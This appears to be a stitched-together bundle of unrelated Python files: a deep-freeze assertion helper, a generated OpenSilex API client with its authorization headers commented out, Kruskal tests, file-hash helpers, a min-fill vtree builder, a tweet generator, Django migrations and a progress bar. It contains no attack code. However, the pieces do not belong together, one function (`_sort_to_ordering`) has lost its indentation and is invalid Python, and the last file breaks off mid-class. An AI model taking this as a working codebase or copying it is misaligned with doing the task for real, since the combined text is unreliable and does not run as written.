    Raises NotFrozenError for dict/list at any level; non-container leaves
    must at least be hashable (hash() raises TypeError otherwise).
    """
    if isinstance(val, (dict, list)):
        raise NotFrozenError(val)
    if isinstance(val, kfrozendict):
        children = tuple(val.values())
    elif isinstance(val, tuple):
        children = val
    else:
        # at this point, the value should at least be hashable
        hash(val)
        return val
    for child in children:
        assertfrozen(child)
    return val
def kassertfrozen(func):
    """Decorator: assert that func's return value is deeply frozen.

    Uses functools.wraps so the wrapper keeps func's name/docstring
    (the original decorator lost them, breaking introspection and debugging).
    """
    import functools

    @functools.wraps(func)
    def inner(*args, **kwargs):
        response = func(*args, **kwargs)
        assertfrozen(response)
        return response
    return inner
|
# coding: utf-8
"""
OpenSilex API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: INSTANCE-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from opensilexClientToolsPython.api_client import ApiClient
class MobileApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """
    # NOTE(review): the Authorization / Accept-Language header lines in every
    # *_with_http_info method below are commented out -- apparently a manual
    # edit on top of the generated code (auth presumably handled by the shared
    # ApiClient); confirm before regenerating this file.

    def __init__(self, api_client=None):
        # Fall back to a default-configured client when none is injected.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def create_form(self, **kwargs):  # noqa: E501
        """Add a form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_form(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param FormCreationDTO body: Form to save
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_form_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.create_form_with_http_info(**kwargs)  # noqa: E501
            return data

    def create_form_with_http_info(self, **kwargs):  # noqa: E501
        """Add a form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_form_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param FormCreationDTO body: Form to save
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body', ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any kwarg the endpoint does not understand.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_form" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        #if 'authorization' in params:
        #    header_params['Authorization'] = params['authorization']  # noqa: E501
        #if 'accept_language' in params:
        #    header_params['Accept-Language'] = params['accept_language']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/mobile/forms', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ObjectUriResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def delete_form(self, uri, **kwargs):  # noqa: E501
        """Delete form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_form(uri, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str uri: Form URI (required)
        :param str authorization: Authentication token (required)
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.delete_form_with_http_info(uri, **kwargs)  # noqa: E501
        else:
            (data) = self.delete_form_with_http_info(uri, **kwargs)  # noqa: E501
            return data

    def delete_form_with_http_info(self, uri, **kwargs):  # noqa: E501
        """Delete form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_form_with_http_info(uri, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str uri: Form URI (required)
        :param str authorization: Authentication token (required)
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['uri', ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_form" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'uri' is set
        if ('uri' not in params or
                params['uri'] is None):
            raise ValueError("Missing the required parameter `uri` when calling `delete_form`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'uri' in params:
            path_params['uri'] = params['uri']  # noqa: E501
        query_params = []
        header_params = {}
        #if 'authorization' in params:
        #    header_params['Authorization'] = params['authorization']  # noqa: E501
        #if 'accept_language' in params:
        #    header_params['Accept-Language'] = params['accept_language']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/mobile/{uri}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ObjectUriResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def search_form_list(self, **kwargs):  # noqa: E501
        """Search forms  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.search_form_list(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param list[str] uris: Search by uris
        :param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
        :param int page: Page number
        :param int page_size: Page size
        :param str accept_language: Request accepted language
        :return: list[FormGetDTO]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.search_form_list_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.search_form_list_with_http_info(**kwargs)  # noqa: E501
            return data

    def search_form_list_with_http_info(self, **kwargs):  # noqa: E501
        """Search forms  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.search_form_list_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param list[str] uris: Search by uris
        :param list[str] order_by: List of fields to sort as an array of fieldName=asc|desc
        :param int page: Page number
        :param int page_size: Page size
        :param str accept_language: Request accepted language
        :return: list[FormGetDTO]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['uris', 'order_by', 'page', 'page_size', ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method search_form_list" % key
                )
            params[key] = val
        del params['kwargs']
        # Both paging parameters must be non-negative.
        if 'page' in params and params['page'] < 0:  # noqa: E501
            raise ValueError("Invalid value for parameter `page` when calling `search_form_list`, must be a value greater than or equal to `0`")  # noqa: E501
        if 'page_size' in params and params['page_size'] < 0:  # noqa: E501
            raise ValueError("Invalid value for parameter `page_size` when calling `search_form_list`, must be a value greater than or equal to `0`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        query_params = []
        if 'uris' in params:
            query_params.append(('uris', params['uris']))  # noqa: E501
            collection_formats['uris'] = 'multi'  # noqa: E501
        if 'order_by' in params:
            query_params.append(('order_by', params['order_by']))  # noqa: E501
            collection_formats['order_by'] = 'multi'  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'page_size' in params:
            query_params.append(('page_size', params['page_size']))  # noqa: E501
        header_params = {}
        #if 'authorization' in params:
        #    header_params['Authorization'] = params['authorization']  # noqa: E501
        #if 'accept_language' in params:
        #    header_params['Accept-Language'] = params['accept_language']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/mobile', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[FormGetDTO]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def update1(self, **kwargs):  # noqa: E501
        """Update form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update1(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param FormUpdateDTO body: Form description
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update1_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.update1_with_http_info(**kwargs)  # noqa: E501
            return data

    def update1_with_http_info(self, **kwargs):  # noqa: E501
        """Update form  # noqa: E501
          # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update1_with_http_info(async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str authorization: Authentication token (required)
        :param FormUpdateDTO body: Form description
        :param str accept_language: Request accepted language
        :return: ObjectUriResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['body', ]  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update1" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        #if 'authorization' in params:
        #    header_params['Authorization'] = params['authorization']  # noqa: E501
        #if 'accept_language' in params:
        #    header_params['Accept-Language'] = params['accept_language']  # noqa: E501
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/mobile', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='ObjectUriResponse',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
|
from unittest import TestCase
from model.graph.Graph import Graph
from model.graph.kruskal import kruskal
class TestKruskal(TestCase):
    """Checks that kruskal() returns exactly the edge set of the minimum
    spanning tree for a collection of small grid-like graphs."""

    @staticmethod
    def contains_edge(v1, v2, edges):
        """Return True if an edge joining v1 and v2 (in either direction)
        is present in the given edge collection."""
        return any(
            {e.from_vertice().name(), e.to_vertice().name()} == {v1, v2}
            for e in edges
        )

    @staticmethod
    def _make_graph(vertices, weighted_edges):
        """Build a Graph from vertex names and (v1, v2, weight) triples."""
        g = Graph()
        for vertex in vertices:
            g.add_vertice(vertex)
        for v1, v2, weight in weighted_edges:
            g.add_edge(v1, v2, weight)
        return g

    def _assert_mst(self, graph, expected):
        """Run kruskal on graph and verify the result is exactly the
        expected list of undirected edges."""
        result = kruskal(graph)
        self.assertEqual(len(expected), len(result))
        for v1, v2 in expected:
            self.assertTrue(self.contains_edge(v1, v2, result))

    def test_three_by_three_graph(self):
        # The graph looks like this:
        # o - o - o
        #     |
        # o - o - o
        # |
        # o - o - o
        names = ["(0, 0)", "(0, 1)", "(0, 2)",
                 "(1, 0)", "(1, 1)", "(1, 2)",
                 "(2, 0)", "(2, 1)", "(2, 2)"]
        n00, n01, n02, n10, n11, n12, n20, n21, n22 = names
        graph = self._make_graph(names, [
            (n00, n01, 0), (n01, n02, 1), (n00, n10, 10), (n01, n11, 2),
            (n02, n12, 11), (n10, n11, 3), (n11, n12, 4), (n10, n20, 5),
            (n11, n21, 12), (n12, n22, 13), (n20, n21, 6), (n21, n22, 7),
        ])
        self._assert_mst(graph, [
            (n00, n01), (n01, n02), (n01, n11), (n10, n11),
            (n11, n12), (n10, n20), (n20, n21), (n21, n22),
        ])

    def test_two_by_three_graph(self):
        # The graph should look like this:
        # o - o - o
        # |       |
        # o - o   o
        names = ["(0, 0)", "(0, 1)", "(0, 2)", "(1, 0)", "(1, 1)", "(1, 2)"]
        n00, n01, n02, n10, n11, n12 = names
        graph = self._make_graph(names, [
            (n00, n01, 0), (n01, n02, 1), (n10, n11, 2), (n11, n12, 9),
            (n00, n10, 3), (n01, n11, 10), (n02, n12, 4),
        ])
        self._assert_mst(graph, [
            (n00, n01), (n01, n02), (n00, n10), (n02, n12), (n10, n11),
        ])

    def test_three_by_two_graph(self):
        # The graph should look like this:
        # o - o
        #     |
        # o   o
        # |   |
        # o - o
        names = ["(0, 0)", "(0, 1)", "(1, 0)", "(1, 1)", "(2, 0)", "(2, 1)"]
        n00, n01, n10, n11, n20, n21 = names
        graph = self._make_graph(names, [
            (n00, n01, 0), (n00, n10, 10), (n01, n11, 1), (n10, n11, 11),
            (n10, n20, 2), (n11, n21, 3), (n20, n21, 4),
        ])
        self._assert_mst(graph, [
            (n00, n01), (n01, n11), (n11, n21), (n21, n20), (n20, n10),
        ])

    def test_two_by_two_graph(self):
        # The graph looks like this:
        # o - o
        #     |
        # o - o
        names = ["(0, 0)", "(0, 1)", "(1, 0)", "(1, 1)"]
        n00, n01, n10, n11 = names
        graph = self._make_graph(names, [
            (n00, n01, 1), (n10, n11, 2), (n01, n11, 3), (n00, n11, 4),
        ])
        self._assert_mst(graph, [(n00, n01), (n10, n11), (n01, n11)])

    def test_one_direction_horizontal_connection(self):
        # The graph looks like this:
        # o - o - o
        names = ["(0, 0)", "(0, 1)", "(0, 2)"]
        n00, n01, n02 = names
        graph = self._make_graph(names, [(n00, n01, 1), (n01, n02, 2)])
        self._assert_mst(graph, [(n00, n01), (n01, n02)])

    def test_one_direction_vertical_connection(self):
        # A single vertical chain of three vertices.
        names = ["(0, 0)", "(1, 0)", "(2, 0)"]
        n00, n10, n20 = names
        graph = self._make_graph(names, [(n00, n10, 1), (n10, n20, 2)])
        self._assert_mst(graph, [(n00, n10), (n10, n20)])
|
import base64
import hashlib
import os
from typing import Iterator, Sequence
def get_all_subpaths(root: str) -> Iterator[str]:
    """
    Yield the path of every file under the given root, relative to root.

    The root is made absolute first; directories themselves are not
    yielded, only regular files found by os.walk.

    Fix: the function is a generator, so its return annotation is
    Iterator[str] rather than Sequence[str] (a generator supports neither
    indexing nor len()).
    """
    root = os.path.abspath(root)
    for dirname, _subdirs, files in os.walk(root):
        for filename in files:
            full_path = os.path.abspath(os.path.join(dirname, filename))
            rel_path = os.path.relpath(full_path, root)
            yield rel_path
def sha256sum(filename):
    """
    Return the raw SHA256 digest of the named file.

    The file is read in fixed-size chunks through a reusable buffer so
    arbitrarily large files are hashed without loading them into memory.
    Inspiration:
    https://stackoverflow.com/a/44873382
    NB: we're deliberately using `digest` instead of `hexdigest` in order to
    mimic Terraform.
    """
    hasher = hashlib.sha256()
    view = memoryview(bytearray(128 * 1024))
    with open(filename, "rb", buffering=0) as stream:
        while True:
            count = stream.readinto(view)
            if not count:
                break
            hasher.update(view[:count])
    return hasher.digest()
def filebase64sha256(filename):
    """
    Computes the Base64-encoded SHA256 hash of a file
    This function mimics its Terraform counterpart, therefore being compatible
    with Pulumi's provisioning engine.
    """
    raw_digest = sha256sum(filename)
    return base64.b64encode(raw_digest).decode()
|
import random
from typing import Dict
from pywmi.engines.xsdd.literals import LiteralInfo
from pywmi.engines.xsdd.vtrees.vtree import Vtree, balanced
from .primal import create_interaction_graph_from_literals
from .int_tree import IntTreeVar, IntTreeLine, IntTreeSplit, IntTreeParallel, IntTree
from .topdown_mincut import conversion_tables
def _sort_to_ordering(ordering: list, orderset: set, cut_off_index: int):
"""
Sort elements in orderset by appearance in ordering, excl. any appearing later than index cut_off_index.
The output is of type: ordering_index, element
:param ordering: A list of ordered elements
:param orderset: A list of elements to sort in order of appearance in ordering
:param cut_off_index: The index from which to start. Any element before this index is excluded from the result.
:return: Each element in orderset that appears in ordering after cut_off_index, returned in order of appearance
in ordering as type: ordering_index, element
"""
assert len(ordering) >= cut_off_index
for index in range(cut_off_index + 1, len(ordering)):
if ordering[index] in orderset:
yield index, ordering[index]
def topdown_minfill(literals: LiteralInfo) -> Vtree:
    """
    Create a vtree by using a top-down min-fill approach.
    :param literals: The context to create a vtree for.
    :return: A vtree based on a top-down min-fill ordering.
    """
    logic2cont, cont2logic = conversion_tables(literals)
    # Create ordering: repeatedly eliminate a variable whose elimination
    # adds the fewest fill-in edges; ties are broken uniformly at random,
    # so output depends on the `random` module's state.
    primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
    primal.compute_fills()
    ordering = []
    neighbor_sets = []
    while primal.nb_fills() > 0:
        minfills = primal.get_minfills()
        selected_var = minfills[random.randint(0, len(minfills) - 1)]
        ordering.append(selected_var)
        neighbor_sets.append(primal.connected_to[selected_var])
        primal.remove_and_process_node(selected_var)
    # Reverse the elimination order to obtain a top-down ordering.
    ordering.reverse()
    if len(ordering) == 0:
        # No interacting variables at all: fall back to a balanced vtree.
        return balanced(literals)
    # Create induced graph: rebuild the primal graph and add the fill-in
    # edges recorded for each eliminated variable.
    primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
    for neighbors in neighbor_sets:  # for each var
        primal.add_edges(neighbors)
    # Construct pseudo tree by depth first traversing the induced graph
    int_trees: Dict[any, IntTree] = dict()
    def _construct_int_tree(var, index):
        """ Construct int_tree depth-first """
        if int_trees.get(var, None) is not None:  # Because then already covered
            return None
        neighbors = primal.connected_to[var]
        # Children are the neighbors that appear later in the ordering.
        children = list(_sort_to_ordering(ordering, neighbors, index))
        if len(children) == 0:
            int_tree = IntTreeVar(var)
            int_trees[var] = int_tree
            return int_tree
        else:
            trees = [_construct_int_tree(child_var, child_index) for (child_index, child_var) in children]
            trees = [tree for tree in trees if tree is not None]
            assert len(trees) >= 1
            # Pick the IntTree node shape matching the number of subtrees.
            if len(trees) == 1:
                int_tree = IntTreeLine(var, trees[0])
                int_trees[var] = int_tree
                return int_tree
            elif len(trees) == 2:
                int_tree = IntTreeSplit(var, trees[0], trees[1])
                int_trees[var] = int_tree
                return int_tree
            else:
                int_tree = IntTreeParallel(var, trees)
                int_trees[var] = int_tree
                return int_tree
    # Build one pseudo tree per connected component; `indices` records the
    # root position of each component in the ordering.
    indices = []
    for index, var in enumerate(ordering):
        if int_trees.get(var, None) is None:
            indices.append(index)
            _construct_int_tree(var, index)
    if len(indices) == 1:
        # Single component: its root is necessarily ordering[0].
        int_tree = int_trees[ordering[0]]
    else:
        int_tree = IntTreeParallel(var=None, trees=[int_trees[ordering[var_index]] for var_index in indices])
    return int_tree.create_vtree(logic2cont.keys(), logic2cont)
def topdown_minfill_shuffle(literals: LiteralInfo) -> Vtree:
    """
    Create a vtree by using a top-down min-fill approach, shuffling the input order.
    :param literals: The context to create a vtree for.
    :return: A vtree based on a top-down min-fill ordering, shuffling the input order

    Bug fix: the shuffled lists (continuous_vars, co_occurrences,
    logic_variables) were previously built but never used -- the original
    dict views were passed instead, making this function behave exactly
    like topdown_minfill. The shuffled inputs are now actually passed on.
    """
    logic2cont, cont2logic = conversion_tables(literals)
    # Randomize the order in which variables and co-occurrences are fed
    # into the interaction graph.
    continuous_vars = list(cont2logic.keys())
    random.shuffle(continuous_vars)
    co_occurrences = list(logic2cont.values())
    random.shuffle(co_occurrences)
    # Create ordering (min-fill elimination, random tie-breaking).
    primal = create_interaction_graph_from_literals(continuous_vars, co_occurrences, True, False)
    primal.compute_fills()
    ordering = []
    neighbor_sets = []
    while primal.nb_fills() > 0:
        minfills = primal.get_minfills()
        selected_var = minfills[random.randint(0, len(minfills) - 1)]
        ordering.append(selected_var)
        neighbor_sets.append(primal.connected_to[selected_var])
        primal.remove_and_process_node(selected_var)
    # Reverse the elimination order to obtain a top-down ordering.
    ordering.reverse()
    if len(ordering) == 0:
        # No interacting variables at all: fall back to a balanced vtree.
        return balanced(literals)
    # Create induced graph from the (shuffled) inputs plus fill-in edges.
    primal = create_interaction_graph_from_literals(continuous_vars, co_occurrences, True, False)
    for neighbors in neighbor_sets:  # for each var
        primal.add_edges(neighbors)
    # Construct pseudo tree by depth first traversing the induced graph
    assert len(ordering) > 0
    int_trees: Dict[any, IntTree] = dict()
    def _construct_int_tree(var, index):
        """ Construct int_tree depth-first """
        if int_trees.get(var, None) is not None:  # Because then already covered
            return None
        neighbors = primal.connected_to[var]
        children = list(_sort_to_ordering(ordering, neighbors, index))
        if len(children) == 0:
            int_tree = IntTreeVar(var)
        else:
            trees = [_construct_int_tree(child_var, child_index) for (child_index, child_var) in children]
            trees = [tree for tree in trees if tree is not None]
            assert len(trees) >= 1
            # Pick the IntTree node shape matching the number of subtrees.
            if len(trees) == 1:
                int_tree = IntTreeLine(var, trees[0])
            elif len(trees) == 2:
                int_tree = IntTreeSplit(var, trees[0], trees[1])
            else:
                int_tree = IntTreeParallel(var, trees)
        int_trees[var] = int_tree
        return int_tree
    # One pseudo tree per connected component.
    indices = []
    for index, var in enumerate(ordering):
        if int_trees.get(var, None) is None:
            indices.append(index)
            _construct_int_tree(var, index)
    if len(indices) == 1:
        int_tree = int_trees[ordering[0]]
    else:
        int_tree = IntTreeParallel(var=None, trees=[int_trees[ordering[var_index]] for var_index in indices])
    # Randomize the logic-variable order handed to vtree construction
    # (previously shuffled but not passed -- part of the same bug fix).
    logic_variables = list(logic2cont.keys())
    random.shuffle(logic_variables)
    return int_tree.create_vtree(logic_variables, logic2cont)
|
from twitter_handler import TwitterHandler
import tweet_maker
import config_manager
from os import path, listdir
import argparse
def run():
    """Parse CLI flags, optionally fetch source tweets, then generate new
    tweets per user plus a combined-model batch, writing all output to the
    configured file."""
    arg_parser = argparse.ArgumentParser(description='Generate Israeli politicians\' tweets')
    arg_parser.add_argument('-f', '--fetch', action='store_true', help='Fetch original tweets (default: False)')
    arg_parser.add_argument('-p', '--post', action='store_true', help='Post new tweets (default: False)')
    cli_args = arg_parser.parse_args()

    general_config = config_manager.get_config('general')
    tweets_dir = general_config['original_tweets_dir']
    out_path = general_config['new_tweets_file']

    if cli_args.fetch:
        # Refresh the local corpus of original tweets before generating.
        TwitterHandler().fetch_all(tweets_dir)

    twitter_users = config_manager.get_config('twitter_users')
    combined_model = None
    with open(out_path, 'w', encoding='utf8') as output:
        for filename in listdir(tweets_dir):
            with open(path.join(tweets_dir, filename), encoding='utf8') as source:
                source_text = source.read()
            generated, model = tweet_maker.make_tweets_from_text(source_text, 10)
            # Accumulate each user's model into one combined model.
            combined_model = tweet_maker.combine(combined_model, model)
            output_tweets(generated, filename, twitter_users[filename], output)
        combined_tweets = tweet_maker.make_tweets_from_model(combined_model, 20)
        output_tweets(combined_tweets, general_config['bot_screen_name'], general_config['bot_name'], output)
def output_tweets(tweets, handle, name, output):
    """Write each non-empty tweet to `output` as 'name (handle): tweet',
    one per line, followed by a single trailing blank line."""
    lines = [
        '{name} ({handle}): {tweet}'.format(name=name, handle=handle, tweet=tweet) + '\n'
        for tweet in tweets if tweet
    ]
    output.writelines(lines)
    output.write('\n')
# Run the generator only when executed as a script (not on import).
if __name__ == '__main__':
    run()
|
# Generated by Django 3.1.3 on 2021-01-04 01:16
from django.db import migrations, models
import django.db.models.deletion
import users.models
class Migration(migrations.Migration):
    # Moves plan-profile content into versioned PlanProfileVersion rows
    # and removes the match-request/matching-history models.
    dependencies = [
        ('users', '0018_profile_rm'),
    ]
    operations = [
        # New table: one row per saved version of a plan profile's content.
        migrations.CreateModel(
            name='PlanProfileVersion',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('version', models.IntegerField(default=1)),
                ('content', models.TextField(blank=True, null=True)),
            ],
        ),
        # Drop the FK before the MatchRequest model is deleted below.
        migrations.RemoveField(
            model_name='matchrequest',
            name='friend_request',
        ),
        # Content moves off PlanProfile; the profile keeps only a pointer
        # to its latest version number.
        # NOTE(review): RemoveField discards existing content with no data
        # migration -- confirm that loss is intended.
        migrations.RemoveField(
            model_name='planprofile',
            name='content',
        ),
        migrations.AddField(
            model_name='planprofile',
            name='latest',
            field=models.IntegerField(default=1),
        ),
        # Updates the graduate_year choice list (presumably extending it
        # through 2025 -- compare with migration 0018 to confirm).
        migrations.AlterField(
            model_name='profile',
            name='graduate_year',
            field=models.CharField(blank=True, choices=[('2018', '2018'), ('2019', '2019'), ('2020', '2020'), ('2021', '2021'), ('2022', '2022'), ('2023', '2023'), ('2024', '2024'), ('2025', '2025')], max_length=255),
        ),
        migrations.DeleteModel(
            name='MatchingHistory',
        ),
        migrations.DeleteModel(
            name='MatchRequest',
        ),
        # Link each version row back to its owning plan profile.
        migrations.AddField(
            model_name='planprofileversion',
            name='plan_profile',
            field=models.ForeignKey(default=users.models.get_plan_profile, on_delete=django.db.models.deletion.CASCADE, to='users.planprofile'),
        ),
    ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds a database index to hmdarecord.as_of_year (field otherwise
    # unchanged from 0001_initial).
    dependencies = [
        ('hmda', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='hmdarecord',
            name='as_of_year',
            # NOTE(review): the bytes help_text (b'...') is a Python 2
            # artifact; harmless to the schema, but worth normalizing to a
            # str in a future migration.
            field=models.PositiveIntegerField(help_text=b'The reporting year of the HMDA record.', db_index=True),
        ),
    ]
|
class ProgressBar:
    """Text progress bar where each character cell is subdivided into
    `pixels_in_char` fill levels, rendered with one glyph per level.

    NOTE(review): PROGRESS_CHARS has 5 entries, so pixels_in_char is
    assumed to be <= 5 -- confirm at call sites.
    """

    # Glyph for fill level i is PROGRESS_CHARS[i - 1]; the last entry
    # represents a completely full cell.
    PROGRESS_CHARS = [u"\u2600", u"\u2601", u"\u2602", u"\u2603", u"\u2604"]

    def __init__(self, max, num_chars, pixels_in_char):
        # `max` is the value corresponding to a 100% full bar.
        self.max = max
        self.value = 0
        self.total_pixels = num_chars * pixels_in_char
        self.pixels_in_char = pixels_in_char
        self.string = ""
        self.pixels_to_draw = 0
        self.update = True
        self.set_value(0)

    def set_value(self, value):
        """Set the current value and re-render the bar string if the
        on-screen pixel count changed."""
        self.value = value
        if self.max > 0:
            # Bug fix: use floor division -- under Python 3 the former `/`
            # produced a float, which then crashed range() below.
            pixels_to_draw = value * self.total_pixels // self.max
        else:
            # Degenerate max: show a full bar.
            pixels_to_draw = self.total_pixels
        if self.pixels_to_draw != pixels_to_draw:
            self.pixels_to_draw = pixels_to_draw
            self.string = ""
            # Full cells first...
            for i in range(0, pixels_to_draw // self.pixels_in_char):
                self.string += ProgressBar.PROGRESS_CHARS[self.pixels_in_char - 1]
            # ...then one partial cell for the remainder, if any.
            rest = pixels_to_draw % self.pixels_in_char
            if rest > 0:
                self.string += ProgressBar.PROGRESS_CHARS[rest - 1]
            self.update = True

    def set_max(self, max):
        """Change the maximum and re-render for the current value."""
        self.max = max
        self.set_value(self.value)

    def get_string(self):
        """Return the rendered bar and clear the update flag."""
        self.update = False
        return self.string
|
import pytest
import webull
# pip install -U pytest
# python -m pytest -s
class TestUserClass:
